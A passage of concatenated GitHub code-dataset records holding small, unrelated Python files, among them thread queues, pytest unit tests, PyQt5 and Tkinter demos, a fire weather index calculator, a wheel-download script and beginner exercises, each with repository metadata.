self.items.popleft()\n\n\nclass ClosableQueue(Queue):\n SENTINEL = object()\n\n def close(self):\n self.put(self.SENTINEL)\n\n def __iter__(self):\n while True:\n item = self.get()\n try:\n if item is self.SENTINEL:\n return\n # raise StopIteration\n yield item\n finally:\n self.task_done()\n\n\nclass Worker(Thread):\n\n def __init__(self, func, in_queue, out_queue):\n super().__init__()\n self.func = func\n self.in_queue = in_queue\n self.out_queue = out_queue\n self.polled_count = 0\n self.work_done = 0\n\n def run(self):\n while True:\n self.polled_count += 1\n try:\n item = self.in_queue.get()\n except IndexError:\n time.sleep(.01)\n else:\n result = self.func(item)\n self.out_queue.put(result)\n self.work_done += 1\n\n\nclass StoppableWorker(Thread):\n\n def __init__(self, func, in_queue, out_queue):\n super().__init__()\n self.func = func\n self.in_queue = in_queue\n self.out_queue = out_queue\n\n def run(self):\n for item in self.in_queue:\n result = self.func(item)\n self.out_queue.put(result)\n\n\ndef download(item):\n # print(f'____downloading {item} ... ')\n time.sleep(.003)\n\n\ndef resize(item):\n # print(f'____resizing {item} ... ')\n time.sleep(.001)\n\n\ndef upload(item):\n # print(f'____uploading {item} ... 
')\n time.sleep(.005)\n\n\n@timer\ndef commence_task_flow():\n download_queue = MyQueue()\n resize_queue = MyQueue()\n upload_queue = MyQueue()\n done_queue = MyQueue()\n\n threads = [\n Worker(download, download_queue, resize_queue),\n Worker(resize, resize_queue, upload_queue),\n Worker(upload, upload_queue, done_queue),\n ]\n\n for thread in threads:\n thread.start()\n\n for _ in range(1000):\n download_queue.put(object())\n\n while len(done_queue.items) < 1000:\n print('Waiting for processing...')\n time.sleep(5)\n\n processed = len(done_queue.items)\n polled = sum(t.polled_count for t in threads)\n print(f'Processed {processed} items after polling {polled} times')\n\n\n@timer\ndef commence_task_flow_with_queue():\n download_queue = ClosableQueue()\n resize_queue = ClosableQueue()\n upload_queue = ClosableQueue()\n done_queue = ClosableQueue()\n\n threads = [\n StoppableWorker(download, download_queue, resize_queue),\n StoppableWorker(resize, resize_queue, upload_queue),\n StoppableWorker(upload, upload_queue, done_queue),\n ]\n\n for thread in threads:\n thread.start()\n\n for _ in range(1000):\n download_queue.put(object())\n\n download_queue.close()\n download_queue.join()\n resize_queue.close()\n resize_queue.join()\n upload_queue.close()\n upload_queue.join()\n\n print(f'{done_queue.qsize()} items finished')\n\n for thread in threads:\n thread.join()\n\n\ndef start_threads(count, *args):\n threads = [StoppableWorker(*args) for _ in range(count)]\n for thread in threads:\n thread.start()\n return threads\n\n\ndef stop_threads(closable_queue, threads):\n for _ in threads:\n closable_queue.close()\n closable_queue.join()\n for thread in threads:\n thread.join()\n\n\n@timer\ndef commence_task_flow_with_queue_cleaner():\n download_queue = ClosableQueue()\n resize_queue = ClosableQueue()\n upload_queue = ClosableQueue()\n done_queue = ClosableQueue()\n\n download_thread = start_threads(3, download, download_queue, resize_queue)\n resize_thread = start_threads(4, resize, resize_queue, upload_queue)\n upload_thread = start_threads(5, upload, upload_queue, done_queue)\n\n for _ in range(1000):\n download_queue.put(object())\n\n stop_threads(download_queue, download_thread)\n stop_threads(resize_queue, resize_thread)\n stop_threads(upload_queue, upload_thread)\n\n print(f'{done_queue.qsize()} items finished')\n","repo_name":"EffectivePythonExercises/ConcurrencyAndParallelism","sub_path":"cnp/use_queue.py","file_name":"use_queue.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74976159892","text":"# coding:utf-8\nimport numpy as np\nimport azurflow_defs as ad\nfrom keras.preprocessing.image import load_img, img_to_array\n\n# some functions used in azurflow\n\n# load image and return fixed image array\ndef load_image(image_path):\n img_array = img_to_array(load_img(image_path))\n img_array /= 255 # 画像配列は255で割って使うのがしきたりらしい\n return img_array\n\n# load memory and return train data\n# (in) memory_name: name of memory\n# (out) ret_x: list of numpy array (one array element represents one image)\n# (out) csv: array of numpy array (one array element represents one click point)\ndef load_memory(memory_name):\n ret_x = []\n memory_dir = ad.MEMORIES_DIR + memory_name + '/'\n\n csv = np.loadtxt(memory_dir + 'record.csv', delimiter=',', skiprows=1)\n num_of_rows = csv.shape[0]\n csv /= 100\n\n for i in range(0, num_of_rows):\n img_array = load_image(memory_dir + str(i) + '.png')\n 
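# Frame i of the recording is expected at \"<i>.png\" alongside record.csv,\n        # so ret_x stays index-aligned with the click-point rows parsed above.\n        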
ret_x.append(img_array)\n\n return ret_x, csv","repo_name":"ya0201/azurflow","sub_path":"azurflow_utils.py","file_name":"azurflow_utils.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70392737833","text":"import pytest\nfrom pytest_devlife import util\ntry:\n import solution\nexcept:\n solution = None\ntry:\n if solution:\n from solution import celsius_para_fahrenheit\nexcept:\n pass\n\n\ndef setup():\n util.function_exists_in_module(solution, 'celsius_para_fahrenheit')\n\n\n\nlista_celsius = [0, 12, 25, 34, 53, 66, 78, 89, 96, 102]\nlista_fahrenheit = [32, 53.6, 77, 93.2, 127.4, 150.8, 172.4, 192.2, 204.8, 215.6]\n\n@pytest.mark.parametrize(\n 'celsius, fahrenheit',\n [\n pytest.param(i, j, id=f'celsius={i} fahrenheit={j}') for i, j in zip(lista_celsius, lista_fahrenheit)\n ]\n)\ndef test_celsius_para_fahrenheit(celsius, fahrenheit):\n obtido = celsius_para_fahrenheit(celsius)\n assert obtido == pytest.approx(fahrenheit), f'Algo deu errado na conversão da temperatura {celsius} celsius em fahrenheit.\\nEra esperado {fahrenheit}, mas foi obtido {obtido}.'\n\n\nlista_neg_celsius = [-200, -164, -142, -120, -100, -86, -50, -32, -15, -1]\nlista_neg_fahrenheit = [-328.0, -263.2, -223.6, -184.0, -148.0, -122.8, -58.0, -25.6, 5.0, 30.2]\n\n@pytest.mark.parametrize(\n 'celsius, fahrenheit',\n [\n pytest.param(k, m, id=f'celsius={k} fahrenheit={m}') for k, m in zip(lista_neg_celsius, lista_neg_fahrenheit)\n ]\n)\ndef test_temperatura_negativa(celsius, fahrenheit):\n obtido = celsius_para_fahrenheit(celsius)\n assert obtido == pytest.approx(fahrenheit), f'Sua conversão não funcionou para o valor negativo {celsius}.\\nEra esperado {fahrenheit}, mas foi obtido {obtido}.'\n\n\ndef test_temperatura_bem_alta():\n obtido = celsius_para_fahrenheit(133495)\n assert obtido == pytest.approx(240323), f'Algo deu errado na conversão da temperatura 133495 celsius em fahrenheit.\\nEra esperado 240323, mas foi obtido {obtido}.'\n","repo_name":"prady001/projects","sub_path":"python/funcao/exercises/celsius_para_fahrenheit/test_solution.py","file_name":"test_solution.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7700030161","text":"#!/usr/bin/python\n# conding=utf-8\n\n\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QProgressBar, QPushButton\nfrom PyQt5.QtCore import QBasicTimer\n\n\nclass ProcessBar(QWidget):\n\n def __init__(self):\n\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n \"\"\"初始化UI界面\"\"\"\n\n # 创建进度条\n self.pbar = QProgressBar(self)\n self.pbar.setGeometry(30, 40, 200, 50)\n\n # self.pbar.setFormat(\"%p\")\n\n # 创建按钮\n self.btn = QPushButton('Start', self)\n\n self.btn.move(40, 80)\n\n self.btn.clicked.connect(self.doAction)\n\n # 创建计时器\n self.timer = QBasicTimer()\n self.step = 0\n\n # window settings\n self.setGeometry(500, 500, 500, 360)\n self.setWindowTitle(\"ProcessBar\")\n self.show()\n \n # QObject 的事件处理函数\n def timerEvent(self, e):\n\n if self.step >= 100:\n self.timer.stop()\n self.btn.setText('Finished')\n return\n \n self.step = self.step + 1\n self.pbar.setValue(self.step)\n # print(self.step)\n\n def doAction(self):\n \"\"\"按钮动作\"\"\"\n\n if self.timer.isActive():\n self.timer.stop()\n self.btn.setText('Start')\n else: \n # start() : 过期时间 & 事件接受者\n self.timer.start(100, self)\n self.btn.setText('Stop')\n\n\n\"\"\"\n20200813 Debug:\nQ: 
由于中文系统显示香港英文。同时日期显示为香港中文。导致了程序显示的进度百分比字体或编码有问题。\nA: 排查过后,将系统日期格式更改为香港英文,即可恢复正常\n环境信息:\n- 系统:简体中文\n- 地区:中国\n- 语言:香港英文(显示美国英文时,可能导致字体错乱)\n- 日期:香港英文\n\"\"\" \nif __name__ == \"__main__\":\n \n app = QApplication(sys.argv)\n\n check_box = ProcessBar()\n\n sys.exit(app.exec_())","repo_name":"abookworm-site/AarPyQt5","sub_path":"06_控件/ar04_ProcessBar.py","file_name":"ar04_ProcessBar.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31177569875","text":"import json\nimport os\nfrom pathlib import Path\nimport subprocess\nimport sys\nfrom typing import List\n\nimport click\nfrom packaging.version import Version # type: ignore\n\nif sys.version_info.minor >= 11 and sys.version_info.major >= 3:\n import tomllib as toml\nelse:\n import tomli as toml # type: ignore\n\n\nWHEELS_DIR = Path(__file__).parent.parent.absolute()/'src'/'azure_devops_artifacts_helpers'/'wheels'\n\nDOWNLOAD_INDEX_URL = os.environ.get('PIP_INDEX_URL', \"https://pypi.org/simple\")\n\n\n@click.command()\n@click.option('--index-url', default=DOWNLOAD_INDEX_URL, help='Index URL to use')\n@click.option('--py', 'python_versions', default=None, multiple=True, help='Python versions to populate, defaults to values set in pyproject.toml', type=str)\n@click.option('--target-dir', default=str(WHEELS_DIR), help='Target directory to output to')\ndef populate_wheels(index_url: str = DOWNLOAD_INDEX_URL, python_versions: List[str] = [], target_dir: str = str(WHEELS_DIR)) -> None:\n # Load from toml section\n with open('pyproject.toml') as f:\n pyproject_toml = toml.loads(f.read())\n packages = pyproject_toml['project']['optional-dependencies']['vendored']\n required_python_versions = pyproject_toml['project']['requires-python']\n dependencies = pyproject_toml['project']['requires-python']\n if not python_versions:\n # This works for same minor version only - assuming no major version change\n _min_version, _max_version = required_python_versions.split(',')\n # Version\n if _min_version.startswith('>='):\n min_version = Version(_min_version.lstrip('>='))\n elif _min_version.startswith('>'):\n _v = Version(_min_version.lstrip('>'))\n min_version = Version(f'{_v.major}.{_v.minor+1}')\n if _max_version.startswith('<='):\n max_version = Version(_max_version.lstrip('<='))\n elif _max_version.startswith('<'):\n _v = Version(_max_version.lstrip('<'))\n max_version = Version(f'{_v.major}.{_v.minor-1}')\n python_versions = [f'{min_version.major}.{minor}' for minor in range(min_version.minor, max_version.minor+1)]\n print(f'Using versions: {python_versions} from {_min_version}:{_max_version}')\n for py_version in python_versions:\n print(f'PLATFORM: {sys.platform} - PYTHON VERSION: {py_version}')\n args = [sys.executable, '-m', 'pip', 'download',\n '--only-binary=:all:',\n f'--python-version={py_version}',\n '-d', target_dir,\n '--index-url', index_url] + packages\n print(' '.join(args))\n print(subprocess.check_output(args).decode())\n print('Downloaded Packages to '+target_dir)\n print('\\t- '+'\\n\\t- '.join([u for u in os.listdir(target_dir) if u.endswith('whl')] ))\n\n\nif __name__ == \"__main__\":\n populate_wheels()\n","repo_name":"djpugh/azure_devops_artifacts_helpers","sub_path":"tools/populate-wheels.py","file_name":"populate-wheels.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"28484575904","text":"# 
https://leetcode.com/problems/minimum-flips-to-make-a-or-b-equal-to-c/description/\n\nclass Solution:\n def minFlips(self, a: int, b: int, c: int) -> int:\n flips = 0\n mask = 1\n \n for _ in range(32):\n av, bv, cv = a & mask, b & mask, c & mask\n flips += (1 + (av & bv != 0)) * (cv == 0) if av | bv else cv != 0\n mask <<= 1\n \n return flips\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_65/min-flips-to-make-a-or-b-equal-to-c.py","file_name":"min-flips-to-make-a-or-b-equal-to-c.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22331292547","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\n'''\nIntro text to this script\n'''\n\nimport math\nimport numpy as np\nimport sys\n\n\nclass FWICLASS:\n \n # ********* new function **********\n # Defining some attributes of the FWICLASS\n def __init__(self,temp,rhum,wind,prcp):\n self.h = rhum # Relative humidity\n self.t = temp # Temperature\n self.w = wind # Wind\n self.p = prcp # Precipitation\n\n \n \n \n # ********* new function ********** \n # Calculating the fine fuel moisture code (FFMC)\n # mo = FFMC on previous day\n # ffmc0 = FFMC as records begin\n # rf = Effective rain fall for calculating FFMC\n # m = Fine Fuel Moisture Content after drying\n # k1 = Intermediate step in calculation of kw\n # kw = Natural log wetting rate, ln (M)/day \n def FFMCcalc(self,ffmc0):\n mo = (147.2*(101.0 - ffmc0))/(59.5 + ffmc0) #*Eq. 1*#\n if (self.p > 0.5):\n rf = self.p - 0.5 #*Eq. 2*#\n if(mo > 150.0):\n mo = (mo+42.5*rf*math.exp(-100.0/(251.0-mo))*(1.0 - math.exp(-6.93/rf))) + (.0015*(mo - 150.0)**2)*math.sqrt(rf) #*Eq. 3b*#\n elif mo <= 150.0:\n mo = mo+42.5*rf*math.exp(-100.0/(251.0-mo))*(1.0 - math.exp(- 6.93/rf)) #*Eq. 3a*#\n if(mo > 250.0):\n mo = 250.0 \n \n \n # Fine Fuel equilibrium moisture content(EMC) for drying \n ed = .942*(self.h**.679) + (11.0*math.exp((self.h-100.0)/10.0))+0.18*(21.1-self.t)*(1.0 - 1.0/math.exp(.1150 * self.h)) #*Eq. 4*#\n\n # Defining m (Fine Fuel Moisture Content after drying )\n if(mo < ed):\n ew = .618*(self.h**.753) + (10.0*math.exp((self.h-100.0)/10.0)) + .18*(21.1-self.t)*(1.0 - 1.0/math.exp(.115 * self.h)) #*Eq. 5*#\n if(mo <= ew):\n kl = .424*(1.0-((100.0-self.h)/100.0)**1.7)+(.0694*math.sqrt(self.w))*(1.0 - ((100.0 - self.h)/100.0)**8) #*Eq. 7a*#\n kw = kl * (.581 * math.exp(.0365 * self.t)) #*Eq. 7b*#\n m = ew - (ew - mo)/10.0**kw #*Eq. 9*#\n elif mo > ew:\n m = mo\n\n elif(mo == ed):\n m = mo\n\n elif mo > ed:\n kl =.424*(1.0-(self.h/100.0)**1.7)+(.0694*math.sqrt(self.w))*(1.0-(self.h/100.0)**8) #*Eq. 6a*#\n kw = kl * (.581*math.exp(.0365*self.t)) #*Eq. 6b*#\n m = ed + (mo-ed)/10.0 ** kw #*Eq. 8*#\n\n # Calculating ffmc output \n ffmc = (59.5 * (250.0 -m)) / (147.2 + m) #*Eq. 10*#\n if (ffmc > 101.0):\n ffmc = 101.0\n if (ffmc <= 0.0):\n ffmc = 0.0\n return ffmc\n \n \n \n \n \n # ********* new function ********** \n # Calculating duff moisture code (DMC)\n # el = Effective day length in DMC, monthly (FOR CANADA)\n # rk = Log drying rate in DMC, ln (M)/day\n # t = temperature\n # wmi = Duff Moisture Content from previous day\n # wmr = Duff moisture content after rain\n # pr = DMC after rain\n # dmc0 = 6.0 (constant)\n # mth = month\n def DMCcalc(self,dmc0,mth):\n el = [8.5,10.0,12.0,14.0,15.5,16.5,16.0,14.5,12.5,10.5,9.0,8.0] # hard coded here for UK›‹\n t = self.t\n if (t < -1.1):\n t = -1.1\n rk = 1.894*(t+1.1) * (100.0-self.h) * (el[mth-1]*0.0001) #*Eqs. 
16 and 17*#\n if self.p > 1.5:\n ra= self.p\n rw = 0.92*ra - 1.27 #*Eq. 11*#\n wmi = 20.0 + 280.0/math.exp(0.023*dmc0) #*Eq. 12*#\n if dmc0 <= 33.0:\n b = 100.0 /(0.5 + 0.3*dmc0) #*Eq. 13a*#\n elif dmc0 > 33.0:\n if dmc0 <= 65.0:\n b = 14.0 - 1.3*math.log(dmc0) #*Eq. 13c*#\n elif dmc0 > 65.0:\n b = 6.2 * math.log(dmc0) - 17.2 #*Eq. 13b*#\n wmr = wmi + (1000*rw) / (48.77+b*rw) #*Eq. 14*#\n pr = 43.43 * (5.6348 - math.log(wmr-20.0)) #*Eq. 15*#\n elif self.p <= 1.5:\n pr = dmc0\n if (pr<0.0):\n pr = 0.0\n dmc = pr + rk\n if(dmc<= 1.0):\n dmc = 1.0\n return dmc\n \n\n \n \n \n # ********* new function ********** \n # Calculating drought code:\n # fl = day length adjustment for drought code\n # t = temp\n # pe = Potential evapotranspiration, units of 0.254 mm water/day \n # mth = month\n # ra = rainfall\n # rw = effective rainfall for drought code calculation\n # smi = Moisture equivalent of previous day’s DC\n # dr = DC after rain\n # dc0 = input constant (15.0)\n def DCcalc(self,dc0,mth):\n fl = [-1.6, -1.6, -1.6, 0.9, 3.8, 5.8, 6.4, 5.0, 2.4, 0.4, -1.6, -1.6] # Related to mean monthly \n #heat index (for Canada)\n t = self.t\n if(t < -2.8):\n t = -2.8\n pe = (0.36*(t+2.8) + fl[mth-1] )/2 #*Eq. 22*# Some linearisation of Thorthwaite\n if pe <= 0.0:\n pe = 0.0\n if (self.p > 2.8):\n ra = self.p\n rw = 0.83*ra - 1.27 #*Eq. 18*#\n smi = 800.0 * math.exp(-dc0/400.0) #*Eq. 19*#\n dr = dc0 - 400.0*math.log( 1.0+((3.937*rw)/smi) ) #*Eqs. 20 and 21*#\n if (dr > 0.0):\n dc = dr + pe\n else:\n dc = pe\n elif self.p <= 2.8:\n dc = dc0 + pe\n return dc\n\n \n \n \n \n # ********* new function **********\n # Calculating Initial Spread Index (ISI)\n # mo = FFMC on previous day\n # ff = Fine fuel moisture function\n def ISIcalc(self,ffmc):\n mo = 147.2*(101.0-ffmc) / (59.5+ffmc) #*Eq. 1*#\n ff = 19.115*math.exp(mo*-0.1386) * (1.0+(mo**5.31)/49300000.0) #*Eq. 25*#\n isi = ff * math.exp(0.05039*self.w) #*Eq. 26*#\n return isi\n\n\n\n\n\n\n # ********* new function **********\n # Calculating build-up index (BUI)\n # dc = drought code\n # dmc = duff moisute code\n def BUIcalc(self,dmc,dc):\n if dmc <= 0.4*dc:\n bui = (0.8*dc*dmc) / (dmc+0.4*dc) #*Eq. 27a*#\n else:\n bui = dmc-(1.0-0.8*dc/(dmc+0.4*dc))*(0.92+(0.0114*dmc)**1.7) #*Eq. 27b*#\n if bui <0.0:\n bui = 0.0\n return bui\n\n\n\n\n\n # ********* new function **********\n # Calculating fire weather index (FWI)\n # bb = Intermediate FWI\n def FWIcalc(self,isi,bui):\n if bui <= 80.0:\n bb = 0.1 * isi * (0.626*bui**0.809 + 2.0) #*Eq. 28a*#\n else:\n bb = 0.1*isi*(1000.0/(25. + 108.64/math.exp(0.023*bui))) #*Eq. 28b*#\n if(bb <= 1.0):\n fwi = bb #*Eq. 30b*#\n else:\n fwi = math.exp(2.72 * (0.434*math.log(bb))**0.647) #*Eq. 
30a*#\n return fwi\n \n \n \n \ndef FWI_calc(UK_data):\n # Slimmed down outputs:\n outputs = np.zeros((1,UK_data.shape[1],UK_data.shape[2],UK_data.shape[3]))\n # Getting variables: mth,temp,rhum,wind,prcp\n print(f'Total number of steps: {UK_data.shape[3]}')\n for k in range(UK_data.shape[3]): #############################################################\n print(f'Step {k}')\n for j in range(UK_data.shape[2]):\n ffmc0 = 85.0\n dmc0 = 6.0\n dc0 = 15.0\n for i in range(UK_data.shape[1]):\n # Getting month (Dec-Nov year structure)\n mth = int(((i-i%30)/30 - 1)%12 + 1)\n temp = UK_data[0,i,j,k]\n rhum = UK_data[1,i,j,k]\n wind = UK_data[2,i,j,k]\n prcp = UK_data[3,i,j,k]\n \n if rhum > 100.0:\n rhum = 100.0\n fwisystem = FWICLASS(temp,rhum,wind,prcp)\n ffmc = fwisystem.FFMCcalc(ffmc0) \n dmc = fwisystem.DMCcalc(dmc0,mth)\n dc = fwisystem.DCcalc(dc0,mth)\n isi = fwisystem.ISIcalc(ffmc)\n bui = fwisystem.BUIcalc(dmc,dc) \n fwi = fwisystem.FWIcalc(isi,bui)\n ffmc0 = ffmc\n dmc0 = dmc\n dc0 = dc\n #print(mth,temp,rhum,wind,prcp,ffmc,dmc,dc,isi,bui,fwi)\n #outputs[:,i,j,k] = mth,ffmc,dmc,dc,isi,bui,fwi\n outputs[:,i,j,k] = fwi\n \n return outputs \n\n","repo_name":"theorrrk/dissertation","sub_path":"scripts/fwi.py","file_name":"fwi.py","file_ext":"py","file_size_in_byte":8289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43061352349","text":"# 세 개의 자연수 A, B, C가 주어질 때 A × B × C를 계산한 결과에 0부터 9까지 각각의 숫자가 몇 번씩 쓰였는지를 구하는 프로그램을 작성하시오.\r\n# 예를 들어 A = 150, B = 266, C = 427 이라면 A × B × C = 150 × 266 × 427 = 17037300 이 되고,\r\n# 계산한 결과 17037300 에는 0이 3번, 1이 1번, 3이 2번, 7이 2번 쓰였다.\r\n\r\na = int(input())\r\nb = int(input())\r\nc = int(input())\r\n\r\nnums_list = list(str(a*b*c))\r\nfor i in range(10):\r\n print(nums_list.count(str(i)))\r\n\r\n\r\n'''\r\na, b, c를 입력받고\r\na,b,c 곱한 결과를 str함수를 이용하여 문자열로 변환\r\nlist를 이용하여 각각의 문자를 요소로 가지는 리스트로 변환\r\ncount를 사용하여 리스트에 문자가 몇개씩 있는지 출력\r\n'''","repo_name":"Hanny0809/Algorithm","sub_path":"2577_숫자개수.py","file_name":"2577_숫자개수.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36688796150","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\n#Original Author: github.com/akloster\n#Changes made by: github.com/cklam19\n\nimport time\nimport sys\nimport argparse\nimport socket\n\nimport random\n\n \n#define IP address same as Gateway\nSERVER_ADDRESS = '169.234.33.113'\n\n\nif __name__ == '__main__':\n \n #define an INET, STREAMing socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #define IP address and match port with EEGServer port\n server_address = (SERVER_ADDRESS,2222)\n print >>sys.stderr, 'connecting to %s port %s' % server_address\n #socket connect requires IP address and also port number\n sock.connect(server_address)\n\n while True:\n #time.sleep(0.25)\n \n nmin = .08\n t_end = time.time() + 60*(nmin)\n \n #append data to array for \n while (time.time() < t_end):\n randNum = random.randrange(-1000,1000)\n sock.sendall(str(randNum))\n print(str(randNum)+'\\n')\n time.sleep(0.010)\n \n \n ","repo_name":"chucklinatlife/EEG_IOT","sub_path":"test-to-wukong.py","file_name":"test-to-wukong.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6788580054","text":"from mygymPrescan.PrescanModel import *\n\n\n\n\nclass Discrete:\n r\"\"\"A discrete space in :math:`\\{ 0, 1, \\\\dots, n-1 
\\}`.\n Example::\n >>> Discrete(2)\n \"\"\"\n\n def __init__(self, n):\n assert n >= 0\n self.n = n\n\n def __repr__(self):\n return \"Discrete(%d)\" % self.n\n\ndef time_range(t_end,steps=0.05):\n return range(int(t_end/steps))\n\nclass Enviroment:\n def __init__(self,outport=None, inport=None):\n self.outport = outport\n self.out = Reciver_UDP_json(outport)\n self.out.build()\n\n self.inport = None\n off_set_port, desired_velocity_port,reset_port = inport\n self.off_set_UDP = Transmitter_UDP(off_set_port) # 8072)\n self.desired_velocity_UDP = Transmitter_UDP(desired_velocity_port) # 8073)\n self.reset_UDP = Transmitter_UDP(reset_port,fmt='?') # 8075)\n\n def __del__(self):\n self.close()\n\n def close(self):\n self.out.close()\n self.off_set_UDP.close()\n self.desired_velocity_UDP.close()\n self.reset_UDP.close()\n for model in Model.objects:\n model.close()\n try:\n eng.quit()\n except:\n pass\n # print('Enviroment-------close')\n\n def reset(self):\n self.reset_UDP.send(True)\n self.reset_UDP.send(False)\n self.send((0,0))\n\n def send(self,data):\n o = data[0];d = data[1]\n self.off_set_UDP.send(o)\n self.desired_velocity_UDP.send(d)\n # self.reset_UDP.send(r,'?')\n\n def get(self):\n self.data = self.out.get()\n self.agent = self.data['Vehicles'][self.data['Object']]\n return self.data\n\n def create_model(self, car_name=None, road_name=None):\n self.road = Road(road_name)\n self.car = Vehicle(car_name, self.road)\n self.road.create()\n self.car.create()\n # print('_____________env______________')\n\n","repo_name":"MohammadRaziei/prescan_test","sub_path":"PreScan_Vissim_Python_1/mygymPrescan/PrescanEnviroment.py","file_name":"PrescanEnviroment.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"6616153744","text":"from ghub import githubutils\nfrom ghub.ghubutils import GHub\n\n\nclass TestGitHubUtils:\n def test_authorize(self):\n ghub = GHub(fromenv=True)\n auth = githubutils.authorize(ghub, fromenv=True)\n assert auth == True\n\n def test_get_user_tabs(self):\n ghub = GHub(fromenv=True)\n githubutils.get_user_tabs(ghub, \"repos\")\n assert ghub.context.context == \"repos\"\n assert ghub.context.location == \"BBloggsbott/repos\"\n ghub.context = ghub.context.prev_context\n githubutils.get_user_tabs(ghub, \"stars\")\n assert ghub.context.context == \"stars\"\n assert ghub.context.location == \"BBloggsbott/stars\"\n ghub.context = ghub.context.prev_context\n githubutils.get_user_tabs(ghub, \"following\")\n assert ghub.context.context == \"following\"\n assert ghub.context.location == \"BBloggsbott/following\"\n ghub.context = ghub.context.prev_context\n githubutils.get_user_tabs(ghub, \"followers\")\n assert ghub.context.context == \"followers\"\n assert ghub.context.location == \"BBloggsbott/followers\"\n ghub.context = ghub.context.prev_context\n githubutils.get_user_tabs(ghub, \"notifications\")\n assert ghub.context.context == \"notifications\"\n assert ghub.context.location == \"BBloggsbott/notifications\"\n ghub.context = ghub.context.prev_context\n\n def test_latest_commit(self):\n ghub = GHub(fromenv=True)\n res = githubutils.get_latest_commit(ghub, \"BBloggsbott/ghub\")\n assert res != False\n\n def test_get_tree(self):\n ghub = GHub(fromenv=True)\n res = githubutils.get_tree(ghub, \"BBloggsbott/ghub\")\n assert res != False\n\n def test_get_user(self):\n ghub = GHub(fromenv=True)\n res = githubutils.get_user(ghub, \"BBloggsbott\")\n assert res != False\n\n def 
test_clone_repo(self):\n ghub = GHub(fromenv=True)\n res = githubutils.clone_repo(ghub, \"~/gitClones\", \"BBloggsbott/ghub\")\n assert res\n\n def test_fork_repo(self):\n ghub = GHub(fromenv=True)\n res = githubutils.fork_repo(ghub, \"BBloggsbott/ghub\")\n assert res == False\n","repo_name":"BBloggsbott/ghub","sub_path":"tests/test_githubutils.py","file_name":"test_githubutils.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33042611616","text":"import tkinter as tk\r\n\r\nwindow = tk.Tk()\r\n#greeting = tk.Label(\r\n# text=\"Hello, Tkinter\",\r\n# foreground=\"white\", # Set the text color to white\r\n# bg=\"#34A2FE\", #set the background color to light blue while using the abbreviated for backgroud bg. \r\n# width=10,\r\n# height=10\r\n#)\r\n#greeting.pack()\r\n\r\n#button = tk.Button(\r\n# text = \"Click Me!\",\r\n# width=25,\r\n# height=5,\r\n# bg=\"blue\",\r\n# fg=\"yellow\"\r\n#)\r\n#button.pack()\r\n\r\nlabel = tk.Label(text='Name')\r\nentry = tk.Entry()\r\nlabel.pack()\r\nentry.pack()\r\n\r\nname = entry.insert(0, \"Python\")\r\n\r\nwindow.mainloop()\r\n\r\n\r\n","repo_name":"fencingbuddha/TkinterFun","sub_path":"TkinterTutorial.py","file_name":"TkinterTutorial.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23242868900","text":"# 1. Countdown- \n# x = int(input(\"Please enter your number: \"))\n# for countdown in range(x, 0, -1):\n# print(countdown)\n\n# 2. Print and Return-\n# def print_and_return(a,b):\n# print(a)\n# return b\n# print_and_return(1,2)\n\n# 3. First plus Length\n# x=[1,2,3,4,5,6,7,8]\n# def first_plus_length(x):\n# sum = int(x[0]) + int(x[len(x)-1])\n# print(sum)\n# first_plus_length(x)\n\n# 4. Values Greater than Second\nx = [1,2,5,3,4,2,6]\ndef values_greater_than_second(x):\n y = []\n for i in range(0, len(x), 1):\n if x[i] > x[1]:\n y.append(int(x[i]))\n else:\n continue\n print(len(y))\n print(y) \nvalues_greater_than_second(x)\n\n# 5. 
This Length, that Value\n# def length_and_value(size,value):\n# y = []\n# for i in range(0, size, 1):\n# y.append(int(value))\n# print(y)\n# length_and_value(6,2)\n\n\n","repo_name":"devidhang/Python-stack","sub_path":"Hang_David_FunctionsBasic2.py","file_name":"Hang_David_FunctionsBasic2.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32680182536","text":"import pylab as plt\nimport time\n\nrawData = open(\"sessions_data.txt\", \"r+\")\n\nrawList = []\n\ntimes = []\nvalA = []\nvalB = []\n\nfor i in rawData.read().split('\\n'):\n splitI = i.split(\"\\t\")\n splitI[0] = splitI[0]\n times.append(time.mktime(time.strptime(splitI[0][0:19], \"%Y-%m-%dT%H:%M:%S\")))\n valA.append(int(splitI[1].strip(\" \").replace(\",\", \"\")))\n valB.append(int(splitI[3].strip(\" \").replace(\",\", \"\")))\n\nprint(times)\nprint(valA)\nprint(valB)\n \nplt.figure('Sessions', figsize=(16,8))\nplt.clf()\nplt.plot(times, valA, 'b-', linewidth = 